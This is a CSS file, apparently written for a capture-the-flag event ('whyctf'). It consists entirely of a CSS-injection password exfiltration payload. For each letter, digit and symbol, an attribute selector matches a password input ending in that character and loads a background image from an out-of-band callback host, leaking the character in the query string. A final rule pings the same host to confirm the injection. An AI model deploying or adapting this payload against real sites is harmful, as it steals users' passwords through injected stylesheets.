/* for whyctf */
input[type="password"][value$="a"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?a"); }
input[type="password"][value$="b"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?b"); }
input[type="password"][value$="c"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?c"); }
input[type="password"][value$="d"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?d"); }
input[type="password"][value$="e"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?e"); }
input[type="password"][value$="f"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?f"); }
input[type="password"][value$="g"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?g"); }
input[type="password"][value$="h"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?h"); }
input[type="password"][value$="i"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?i"); }
input[type="password"][value$="j"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?j"); }
input[type="password"][value$="k"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?k"); }
input[type="password"][value$="l"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?l"); }
input[type="password"][value$="m"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?m"); }
input[type="password"][value$="n"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?n"); }
input[type="password"][value$="o"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?o"); }
input[type="password"][value$="p"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?p"); }
input[type="password"][value$="q"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?q"); }
input[type="password"][value$="r"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?r"); }
input[type="password"][value$="s"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?s"); }
input[type="password"][value$="t"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?t"); }
input[type="password"][value$="u"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?u"); }
input[type="password"][value$="v"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?v"); }
input[type="password"][value$="w"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?w"); }
input[type="password"][value$="x"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?x"); }
input[type="password"][value$="y"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?y"); }
input[type="password"][value$="z"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?z"); }
input[type="password"][value$="A"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?A"); }
input[type="password"][value$="B"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?B"); }
input[type="password"][value$="C"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?C"); }
input[type="password"][value$="D"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?D"); }
input[type="password"][value$="E"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?E"); }
input[type="password"][value$="F"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?F"); }
input[type="password"][value$="G"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?G"); }
input[type="password"][value$="H"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?H"); }
input[type="password"][value$="I"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?I"); }
input[type="password"][value$="J"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?J"); }
input[type="password"][value$="K"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?K"); }
input[type="password"][value$="L"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?L"); }
input[type="password"][value$="M"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?M"); }
input[type="password"][value$="N"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?N"); }
input[type="password"][value$="O"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?O"); }
input[type="password"][value$="P"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?P"); }
input[type="password"][value$="Q"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?Q"); }
input[type="password"][value$="R"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?R"); }
input[type="password"][value$="S"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?S"); }
input[type="password"][value$="T"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?T"); }
input[type="password"][value$="U"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?U"); }
input[type="password"][value$="V"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?V"); }
input[type="password"][value$="W"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?W"); }
input[type="password"][value$="X"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?X"); }
input[type="password"][value$="Y"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?Y"); }
input[type="password"][value$="Z"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?Z"); }
input[type="password"][value$="0"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?0"); }
input[type="password"][value$="1"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?1"); }
input[type="password"][value$="2"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?2"); }
input[type="password"][value$="3"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?3"); }
input[type="password"][value$="4"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?4"); }
input[type="password"][value$="5"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?5"); }
input[type="password"][value$="6"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?6"); }
input[type="password"][value$="7"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?7"); }
input[type="password"][value$="8"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?8"); }
input[type="password"][value$="9"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?9"); }
input[type="password"][value$="_"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?_"); }
input[type="password"][value$="="] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?="); }
input[type="password"][value$="-"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?-"); }
input[type="password"][value$="@"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?@"); }
input[type="password"][value$="{"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?open"); }
input[type="password"][value$="}"] { background: url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?close"); }
body {color: red; background:url("https://d2c6q2mz1wg0000rx2aggtgdcdoyyyyyn.oast.pro?ping");}